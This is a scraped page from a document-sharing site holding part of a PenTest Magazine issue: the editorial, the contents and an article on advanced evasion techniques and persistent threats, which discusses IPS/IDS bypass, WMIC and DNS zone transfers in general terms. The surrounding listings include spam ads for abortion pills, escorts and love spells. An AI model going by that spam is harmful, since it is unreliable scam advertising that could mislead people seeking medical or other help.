Proactive cyber defence through adversary emulation for improving your securi...
Proactive cyber defence through adversary emulation for improving your securi...Proactive cyber defence through adversary emulation for improving your securi...
Proactive cyber defence through adversary emulation for improving your securi...
 
Hacking3e ppt ch09
Hacking3e ppt ch09Hacking3e ppt ch09
Hacking3e ppt ch09
 
Hacking3e ppt ch11
Hacking3e ppt ch11Hacking3e ppt ch11
Hacking3e ppt ch11
 
Chapter 1 2
Chapter 1 2Chapter 1 2
Chapter 1 2
 
Hacktive Security - Ethical Hacking Services
Hacktive Security - Ethical Hacking ServicesHacktive Security - Ethical Hacking Services
Hacktive Security - Ethical Hacking Services
 
Stalking the Kill Chain
Stalking the Kill ChainStalking the Kill Chain
Stalking the Kill Chain
 
Software Piracy Protection
Software Piracy ProtectionSoftware Piracy Protection
Software Piracy Protection
 
Cyber security
Cyber securityCyber security
Cyber security
 
Advanced persistent threat (apt) & data centric audit and protection (dacp)
Advanced persistent threat (apt) & data centric audit and protection (dacp)Advanced persistent threat (apt) & data centric audit and protection (dacp)
Advanced persistent threat (apt) & data centric audit and protection (dacp)
 
Hacking3e ppt ch04
Hacking3e ppt ch04Hacking3e ppt ch04
Hacking3e ppt ch04
 
Cyber weapons 1632578286
Cyber weapons 1632578286Cyber weapons 1632578286
Cyber weapons 1632578286
 
Countering the Advanced Persistent Threat Challenge with Deep Discovery
Countering the Advanced Persistent Threat Challenge with Deep DiscoveryCountering the Advanced Persistent Threat Challenge with Deep Discovery
Countering the Advanced Persistent Threat Challenge with Deep Discovery
 
Governance in Cybercrime and Cybersecurity orgns - final distribution Organiz...
Governance in Cybercrime and Cybersecurity orgns - final distribution Organiz...Governance in Cybercrime and Cybersecurity orgns - final distribution Organiz...
Governance in Cybercrime and Cybersecurity orgns - final distribution Organiz...
 
Sizing the Cyber Skills Gap
Sizing the Cyber Skills GapSizing the Cyber Skills Gap
Sizing the Cyber Skills Gap
 
Revolution Or Evolution Exec Summary
Revolution Or Evolution Exec SummaryRevolution Or Evolution Exec Summary
Revolution Or Evolution Exec Summary
 
Layer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load TargetLayer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load Target
 
AI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for ThoughtAI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for Thought
 
Summer internship - Cybersecurity
Summer internship - CybersecuritySummer internship - Cybersecurity
Summer internship - Cybersecurity
 

Similar a Pt08 19 final1

Noah Maina: Computer Emergency Response Team (CERT)
Noah Maina: Computer Emergency Response Team (CERT)Noah Maina: Computer Emergency Response Team (CERT)
Noah Maina: Computer Emergency Response Team (CERT)
Hamisi Kibonde
 
Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.PDF
Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.PDFSeven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.PDF
Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.PDF
Tor Cannady
 
Unveiling the Art of Threat Detection: Safeguarding the Digital Landscape
Unveiling the Art of Threat Detection: Safeguarding the Digital LandscapeUnveiling the Art of Threat Detection: Safeguarding the Digital Landscape
Unveiling the Art of Threat Detection: Safeguarding the Digital Landscape
greendigital
 
Ethnosit.net
Ethnosit.netEthnosit.net
Ethnosit.net
ethnos
 

Similar a Pt08 19 final1 (20)

Cyber Immunity Unleashed: Explore the Future with iTech Magazine!
Cyber Immunity Unleashed: Explore the Future with iTech Magazine!Cyber Immunity Unleashed: Explore the Future with iTech Magazine!
Cyber Immunity Unleashed: Explore the Future with iTech Magazine!
 
Ashar Shaikh A-84 SEMINAR.pptx
Ashar Shaikh A-84 SEMINAR.pptxAshar Shaikh A-84 SEMINAR.pptx
Ashar Shaikh A-84 SEMINAR.pptx
 
Noah Maina: Computer Emergency Response Team (CERT)
Noah Maina: Computer Emergency Response Team (CERT)Noah Maina: Computer Emergency Response Team (CERT)
Noah Maina: Computer Emergency Response Team (CERT)
 
OpenText Threat Hunting Service
OpenText Threat Hunting ServiceOpenText Threat Hunting Service
OpenText Threat Hunting Service
 
STAYING SAFE AND SECURED ON TODAY AND TOMORROW’S AFRICA CYBERSPACE WORKSHOP 2017
STAYING SAFE AND SECURED ON TODAY AND TOMORROW’S AFRICA CYBERSPACE WORKSHOP 2017STAYING SAFE AND SECURED ON TODAY AND TOMORROW’S AFRICA CYBERSPACE WORKSHOP 2017
STAYING SAFE AND SECURED ON TODAY AND TOMORROW’S AFRICA CYBERSPACE WORKSHOP 2017
 
PandaLabs Reveals its Predictions for Cybersecurity Trends in 2018
PandaLabs Reveals its Predictions for Cybersecurity Trends in 2018PandaLabs Reveals its Predictions for Cybersecurity Trends in 2018
PandaLabs Reveals its Predictions for Cybersecurity Trends in 2018
 
Security - intelligence - maturity-model-ciso-whitepaper
Security - intelligence - maturity-model-ciso-whitepaperSecurity - intelligence - maturity-model-ciso-whitepaper
Security - intelligence - maturity-model-ciso-whitepaper
 
Inria - Cybersecurity: current challenges and Inria’s research directions
Inria - Cybersecurity: current challenges and Inria’s research directionsInria - Cybersecurity: current challenges and Inria’s research directions
Inria - Cybersecurity: current challenges and Inria’s research directions
 
Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.PDF
Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.PDFSeven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.PDF
Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.PDF
 
Unveiling the Art of Threat Detection: Safeguarding the Digital Landscape
Unveiling the Art of Threat Detection: Safeguarding the Digital LandscapeUnveiling the Art of Threat Detection: Safeguarding the Digital Landscape
Unveiling the Art of Threat Detection: Safeguarding the Digital Landscape
 
Case Study.pdf
Case Study.pdfCase Study.pdf
Case Study.pdf
 
Get Ahead of Cyber Security by Tiffy Issac, Partner EY India
Get Ahead of Cyber Security by Tiffy Issac, Partner EY IndiaGet Ahead of Cyber Security by Tiffy Issac, Partner EY India
Get Ahead of Cyber Security by Tiffy Issac, Partner EY India
 
2014 the future evolution of cybersecurity
2014 the future evolution of cybersecurity2014 the future evolution of cybersecurity
2014 the future evolution of cybersecurity
 
Main Menu
Main MenuMain Menu
Main Menu
 
Cobit 2
Cobit 2Cobit 2
Cobit 2
 
How to avoid cyber security attacks in 2024 - CyberHive.pdf
How to avoid cyber security attacks in 2024 - CyberHive.pdfHow to avoid cyber security attacks in 2024 - CyberHive.pdf
How to avoid cyber security attacks in 2024 - CyberHive.pdf
 
The Future of Cyber Security - Matthew Rosenquist
The Future of Cyber Security - Matthew RosenquistThe Future of Cyber Security - Matthew Rosenquist
The Future of Cyber Security - Matthew Rosenquist
 
Ethnosit.net
Ethnosit.netEthnosit.net
Ethnosit.net
 
Guide to high volume data sources for SIEM
Guide to high volume data sources for SIEMGuide to high volume data sources for SIEM
Guide to high volume data sources for SIEM
 
White Hat 6 March 2015 v2.2
White Hat 6 March 2015 v2.2White Hat 6 March 2015 v2.2
White Hat 6 March 2015 v2.2
 

Más de Francisco Santibañez

Más de Francisco Santibañez (20)

Manual estudiante moodle
Manual estudiante moodleManual estudiante moodle
Manual estudiante moodle
 
Revista ganando espacios 504
Revista ganando espacios 504Revista ganando espacios 504
Revista ganando espacios 504
 
Manifiesto del Tren de Calves Cluetrain
Manifiesto del Tren de Calves CluetrainManifiesto del Tren de Calves Cluetrain
Manifiesto del Tren de Calves Cluetrain
 
Guia para principiantes de nombres de dominio
Guia para principiantes de nombres de dominio Guia para principiantes de nombres de dominio
Guia para principiantes de nombres de dominio
 
Los dominios en internet
Los dominios en internetLos dominios en internet
Los dominios en internet
 
Revista mexiquenses abril 2020
Revista mexiquenses abril 2020Revista mexiquenses abril 2020
Revista mexiquenses abril 2020
 
Mexiquenses xxi 011
Mexiquenses xxi 011Mexiquenses xxi 011
Mexiquenses xxi 011
 
El pulso del estado de México 730
El pulso del estado de México 730El pulso del estado de México 730
El pulso del estado de México 730
 
Guía de precios y sevicios DHL 2020
Guía de precios y sevicios DHL 2020Guía de precios y sevicios DHL 2020
Guía de precios y sevicios DHL 2020
 
Guía general para empaque - Fedex
Guía general para empaque - FedexGuía general para empaque - Fedex
Guía general para empaque - Fedex
 
Obligaciones fiscales de las sociedades anónimas
Obligaciones fiscales de las sociedades anónimasObligaciones fiscales de las sociedades anónimas
Obligaciones fiscales de las sociedades anónimas
 
Guia de autocumplimiento marcas IMPI
Guia de autocumplimiento marcas IMPIGuia de autocumplimiento marcas IMPI
Guia de autocumplimiento marcas IMPI
 
Guía práctica de seguridad de TI para empresas pequeñas
Guía práctica de seguridad de TI para empresas pequeñasGuía práctica de seguridad de TI para empresas pequeñas
Guía práctica de seguridad de TI para empresas pequeñas
 
Introducciónn a la propiedad intelectual
Introducciónn a la propiedad intelectualIntroducciónn a la propiedad intelectual
Introducciónn a la propiedad intelectual
 
Cetes Directo Inversión en Valores Gubernamentales
Cetes Directo Inversión en Valores GubernamentalesCetes Directo Inversión en Valores Gubernamentales
Cetes Directo Inversión en Valores Gubernamentales
 
730
730730
730
 
Revista Ganando Espacios 496
Revista Ganando Espacios 496Revista Ganando Espacios 496
Revista Ganando Espacios 496
 
Encuesta 110 agosto 2019
Encuesta 110 agosto 2019Encuesta 110 agosto 2019
Encuesta 110 agosto 2019
 
Revista ganando espacios 494
Revista ganando espacios 494 Revista ganando espacios 494
Revista ganando espacios 494
 
Revista Ganando Espacios número 493
Revista Ganando Espacios número 493Revista Ganando Espacios número 493
Revista Ganando Espacios número 493
 

Último

%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
masabamasaba
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
Health
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
VictorSzoltysek
 
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
masabamasaba
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
VictoriaMetrics
 

Último (20)

Define the academic and professional writing..pdf
Define the academic and professional writing..pdfDefine the academic and professional writing..pdf
Define the academic and professional writing..pdf
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With SimplicityWSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
 
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
 
WSO2CON2024 - It's time to go Platformless
WSO2CON2024 - It's time to go PlatformlessWSO2CON2024 - It's time to go Platformless
WSO2CON2024 - It's time to go Platformless
 
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
 
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems -The Print[A] Example- A Comprehension AidDirect Style Effect Systems -The Print[A] Example- A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 

Pt08 19 final1

  • 1.
  • 2. 1 EDITORIAL TEAM Managing Editor Bartłomiej Adach Proofreaders & Betatesters Lee McKenzie, Natalie Fahey, David Kosorok, Avi Benchimol, Tom Updegrove, Bernhard Waldecker, Girshel Chokhonelidze, Hammad Arshed, Matthew Sabin, Kevin Goosie, Ricardo Puga, Clancey McNeal, Ali Abdollahi, Craig Thornton. Special thanks to the Proofreaders & Betatesters who helped with this issue. Without their assistance there would not be a PenTest Magazine. Senior Consultant/Publisher Paweł Marciniak CEO Joanna Kretowicz DTP Bartłomiej Adach bartek.adach@pentestmag.com joanna.kretowicz@pentestmag.com bartek.adach@pentestmag.com COVER DESIGN Hiep Nguyen Duc PUBLISHER Hakin9 Media Sp. z o.o.
 02-676 Warszawa
 ul. Postępu 17D 
 Phone: 1 917 338 3631  www.pentestmag.com All trademarks, trade names, or logos mentioned or used are the property of their respective owners. The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.
  • 3. Dear PenTest Readers, Another summer edition of our magazine is here, and it’s full of valuable infosec content. The two opening articles are related to the topic of Advanced Persistent Threats. Professor John Walker starts with presenting the interdependence of ATPs and Advanced Evasion Techniques (AET). In the article he tries to answer the question why Persistent Threats and Evasions will not see any decline any time soon. Mariana Peycheva, in turn, presents the analysis of Advanced Persistent Threats and its methodology, giving a great overview the topic. As one of our reviewers said: “I wish that most of business leaders and managers would read this”.  Chris Cochran wrote a very interesting piece, which can be considered as a guide for those building, executing, or consuming threat intelligence. Abhi Singh is the author of a thought leadership article on securing the API economy. It describes, at a high level, what kind of processes and architecture it would take to make a secure and resilient API ecosystem. Pal Patel provides the readers with really interesting case study on the usage of Right To Left Override technique. You should definitely check this article out and find out more about this interesting trick!  Two of our regular contributors, Bohdan Ethics and Dinesh Sharma, provided new articles this month as well. Bohdan brought to the table a presentation of antivirus evasion basics. Dinesh presents the readers with different types of compliance audits, with a special angle on critical infrastructure. Ankit Giri emphasizes the significance of mobile exploit applications in article, Vlad Martin points our attention to the way in which black hats are collecting personal data in the Commonwealth of Independent State member-countries, and, last but not least, David Evenden and Kent Potter present the Collegiate Cybersecurity Education Program that they developed together. 
 Special thanks to all of the contributors, reviewers, and proofreaders involved in the process of creation of this issue. 
 
 Without further ado,   Enjoy the content! PenTest Magazine’s Editorial Team. 2
  • 4. Contents Long-Armed Persistence of Threats Compliance Audit for Critical Infrastructure Ankit Giri 4 Advanced Persistent Threats – Silent But Smart Mariana Peycheva 10 The Threat Intelligence EASY Button Chris Cochran 17 21 Black Hats: How They Are Collecting Personal Data in the CIS Countries 31 55 Right to Left Override (RTLO) Technique 35Bohdan Ethics Antivirus Evasion Basics Dinesh Sharma 69 63 Vlad Martin 73 Prof. John Walker Pal Patel Kent Potter and David Evenden How StandardUser Is Working with Practitioners and Universities to Close the Talent Gap The Significance of Mobile Exploit Applications Abhi Singh Securing the API Economy
  • 5. Long-Armed Persistence of Threats Long-Armed Persistence of Threats It was circa 2010/11 when I was approached by a Helsinki-based company – Stonesoft. Stonesoft wanted to discuss a new angled threat vector which they referred to as the AET (Advanced Evasion Technique). I agreed to meet with them at the InfoSecurity show of the day in London, and approached the conversation with more than a little skepticism - could this be yet another InfoSec over-hyped terminology? Surrounded with the usual InfoSecurity run-of-mill, mundane talk of the day, which in that year was PCI-DSS and, of course, Penetration Testing, it would be at least refreshing to learn about something new. With doubt in my mind, the conversation 4 Time is now long past that dictates a fresh way of delivering agile cyber-defense is now a must have, with the recognition that something, somewhere must change if we are to win the cyber-security race. No matter what we deploy, and how we operate those commercially procured systems and applications, one fact is certain – we will encounter a Persistent Threat on an every-day basis in some form – it may be a matter of such encountered threats are passive, awaiting their time to go malevolent at their opportune moment; or, active and already on a mission to avoid detection whilst delivering payload. It is now time to act, and look at Cyber-Security in a new way, with joined up thinking, along with a recognition and guarantee that we have been or will be breached. 
22 years in Royal Air Force Security/Investigations and Counter Intelligence operations [Overt/Covert] service, working alongside GCHQ, CESG, UK and US Agencies, ITSO and Systems Security Manager for CIA Accredited Systems, Visiting Professor School of Science/ Technology - Nottingham Trent University [NTU],  Advisory Board, Research Centre in Cyber Security (KirCCS) at University of Kent, Mentor to Tallinn University (Estonia) Masters Students Cyber Research, Practicing and Registered Expert Witness, Certified Forensics Investigator Practitioner [CFIP], Editorial Member at MedCrave Research for Forensics & Criminology, ENISA CEI Listed Expert, Editorial Member of the Cyber Security Research Institute [CRSI], Digital Forensics/Cyber Security Listed Trainer at Meirc [Dubai] of Certified courses, and Fellow of Royal Society for the Arts [FRSA], writer for Apress Publishing New York, and a Belkasoft (Digital Forensics) Partner. Professor John Walker Long-Armed Persistence of Threats
  • 6. progressed, and I was introduced to this new hypothesis of this AET thing. As the conversation proceeded with my introduction to the AET, the theoretical value started to gain traction, and I found myself being pulled into what I had considered a concept, toward the fact that it was possibly a new threat vector with significant implications of insecurity. The basics of the AET were to evolve and utilize evasion techniques as a means to disguise and/or modify cyber-attacks through network connections, and to thus avoid detection by those deployed systems which were supposedly delivering protection to the corporate valued assets. The objective here was, of course, to achieve the successful delivery of hidden malicious content (payload), and the onward exploitation of a vulnerable target host – here seeing Network Security Devices that are designed to conduct real-time, deep- packet inspection of the network traffic rendered potentially ineffective resulting in: • Critical digital assets left unprotected • A false sense of security born out of dependencies on supposed secure, up to date commercial network defenses • Organizations left not meeting their regulatory compliancy requirements • A higher success rate of encountered network attacks • A shift in the Threat Landscape supporting opportunities of high reward (financial, strategic, political or technical) for the ‘advanced’ tech-savvy cyber-criminals Given that at the time of the AET threat first being made public, the Verizon 2010 Business Data Breach Investigations of the day Report stated that approximately 20% of incidents where malware had been discovered had an unknown component for the infection vector – which moves us down the road of Zero Days, a state which in 2019 has seen significant leap forward in growth, combined with an increase in cross-platform threats - it may be thus reasonable to conclude that, what was seen as a new threat in 2010/11, is now a threat vector with a close similarity to 
the Elephant in the Room! The basis of the AET was simply to manipulate the IP Stack in such a way that the encountering IPS/IDS, or firewalling technology would be confused by what its interface was seeing in the profile of a malformed stack, and thus, in theory, would take one of, or a combination of, five actions: 1. Block 2. Allow 3. Alert 4. Write to the Log 5. Not write to the Log 5 Long-Armed Persistence of Threats
  • 7. At the time of the AET being made public, there were 180+ stackable and combinable evasions being researched in testing framework, meaning that these built up to a potential set of attack vectors, which were concluded to be impossible to counter against all combinations without some form of an automated evasion testing framework without which, vendors were denied the opportunities to develop adequate anti-evasion capabilities and network defenses – a situation that gets worse when applied under IPv6, which offers a vastly expanded combination of a malevolent cyber-universe, as described by Stonesoft’s Harri Haanpää as: “Evasion techniques are a means to disguise and/or modify cyber-attacks to avoid detection and blocking by information security systems. They typically make use of rarely used protocol properties in unusual combinations and deliberate protocol violations. Such obfuscations may confuse the detection capabilities of intrusion prevention/detection systems.” At the time of the early work into the AET, Jack Walsh Program Manager (ICSA labs) concluded that “Advanced Evasion Techniques can evade (and did) many network security systems. He went on to comment, we were able to validate Stonesoft’s research and believe that these Advanced Evasion Techniques can result in lost corporate assets with potentially serious consequences for breached organizations.” To add to the weight behind, what was then, and to a large extent, and still is an ignored threat, Bob Walder, Research Director at Gartner commented, “Recent research indicates that Advanced Evasion Techniques are real and credible – not to mention growing – a growing threat against the network security infrastructure that protects governments, commerce and information-sharing worldwide. Network security vendors need to devote the research and resources to finding a solution.“ – and yet at that time, and even today, the threats are still largely ignored, or should I say tolerated. 
However, up to this point I had only been listening to the theoretical description of the threat in this new 'AET' conversation, but I was interested enough to agree to work alongside Stonesoft and visited their labs in Helsinki to see the pragmatic side. Under lab conditions, the highly skilled Stonesoft team demonstrated testing of a variety of the latest-release, fully up-to-date firewalling products for their exposure to the AET threat, and the discoveries were astonishing, with results for all tested devices of:
• Bypass of the perimeter device to reach a supposedly protected asset
• Logs not being updated, or annotated with the wrong information
Upon returning from my visit, I was convinced that the new-age AET threat was real, and along with Stonesoft I wrote a paper on the subject. However, as one always encounters in the cyber security industry, that paper and Stonesoft's research were challenged, one of the most vocal critics being McAfee, who denounced the research outright. Interestingly enough, notwithstanding their public opinion on the AET, McAfee acquired Stonesoft for $389 million in 2013; I can only conclude that the paper and research they denounced must have struck a note which enticed them to put their hands in their pockets of denial!

On the associated subject of the APT (Advanced Persistent Threat), we can see the emergence of the AET into a new combined landscape of network dangers, dangers I have observed first hand inflicting breaches and compromises on supposedly protected end-points, resulting in the bypass of firewalls, IDS, and IPS alike.
Long-Armed Persistence of Threats
However, it is here where we start to see the strain of ignored system updates taking their toll. For example, the continued use of out-of-patch operating systems, like the seventeen-year-old Windows XP, which saw the massive and successful WannaCry attack on the NHS; this cost the taxpayer £92 million and resulted in the cancellation of over 19,000 appointments, some of which had real-world, life-affecting consequences. It is also still possible to see the old approach where internal systems are not maintained with an adequate security profile on the premise that they are hidden from the external interface that points to the dangerous outside world, and thus are not covered by anti-malware protection or, as I encountered at an oil and gas company, by any form of logging set against the systems and folders storing critical data assets. In such cases the AET and the APT are ideal partners, with the AET serving up the means by which to avoid detection and to deliver its payload (the APT), and the APT taking on the profile of, say, the Conficker agent, which is a great little bit of malware for creating a shell condition on its vulnerable targeted system. From there, if the attacker is lucky enough, they will find other routine on-system tools such as the Windows Management Instrumentation Command line (WMIC, wmic.exe), which offers a multitude of intelligence-gathering and compromise opportunities. And then there are the much-forgotten dangers from the world of DNS, which can leave a great big black hole open in the style of a Cuckoo's Egg attack, leveraging a zone transfer to quietly discover internal gems; in one first-hand case concerning an East Midlands based credit reference agency, this allowed the acquisition of a script containing a hard-coded user ID and the associated password, and then of course onward potentials for compromise!
(Figure: wmic.exe)
Having started off circa 2010, we now move into the year 2019, in which we still see the risks and attack vectors of the AET and APT at an all-time high, and this against a backdrop of higher than ever spend on security, alongside the growing complexity of a cyber-dependent, always-connected business and social society; a world in which, according to McAfee some years back, they were winning the cyber-security race. I think not! The time is here where we need to ask the right questions about our level of deployed defenses, starting with those shown in the image below:
1. Security level evaluation/audits of existing security devices: Do evasions pose a threat to us (or not)? Have we evaluated security risks correctly, and are we managing these risks?
2. New product evaluation for investment decisions: Which product offers the highest protection against evasions? How can I verify vendor claims?
3. Redesigning network security: Is our security level high enough? Where to place or relocate IPS/deep packet inspection devices? And what kind?
So, where are we today? Evidenced by the long list of breached and compromised organizations who have invested small fortunes and placed their ultimate trust in commercial devices and staff to defend their technology kingdoms, one may only conclude that the case that Persistent Threats and Evasions are not seeing any demise soon is made, and the question must be asked: what is going wrong? Is it that:
• The reliance on the over-priced commercial promise of the silver-bullet security device, with over-expectation of its actual capability to defend the network, is flawed?
• We have gone so far down the long path of a tick-box, compliance-led security approach that we have parted company with the bits and bobs of technical security skills?
• The skills gap issue in cyber space is now hitting its mark with an adverse effect?
• Under-maintained, over-exposed assets residing on the network add to the conundrum of insecurity?
• Or finally, as with the combination of an AET with the APT, is it that all of the aforementioned have their own part to play in a world that will assure the Persistent Threats continue to evolve and bite!
Looking back over the years from 2010 right up to 2019, what is so very interesting is that the only thing that has changed is that the situation of insecurity has become far worse, in a world in which Persistent Threats are ever present and being leveraged by a range of adversarial actors, from those with quick-win monetary gain in mind, to the state-sponsored activities of geopolitical aggressors, not to mention the commercially motivated serious and organized crime gangs. Thus, the time is long past when a fresh way of delivering agile cyber-defense became a must-have, with the recognition that something, somewhere must change if we are to win the cyber-security race. No matter what we deploy, and how we operate those commercially procured systems and applications, one fact is certain: we will encounter a Persistent Threat on an everyday basis in some form. Such encountered threats may be passive, awaiting their time to go malevolent at the opportune moment, or active and already on a mission to avoid detection whilst delivering their payload. It is now time to act and look at cyber-security in a new way, with joined-up thinking, along with the recognition and guarantee that we have been, or will be, breached. We must start to evolve the mindset of deployed states of readiness associated with the recognition that proactive defenses may be (are) flawed, and take up a robust posture on the reactive side of 'Response' to underpin structured engagement with, and recovery from, the most adverse of anticipated known-unknown conditions of the Persistent Threat.
Above all, we must deploy our infrastructures from the ground up in a well-formed, well-documented and potentially segmented way to take into account that Persistent Threats will be seeking to leverage and exploit any one of many combinations of exposure opportunities to deliver their show-stopping payload!
Advanced Persistent Threats – Silent But Smart

Introduction
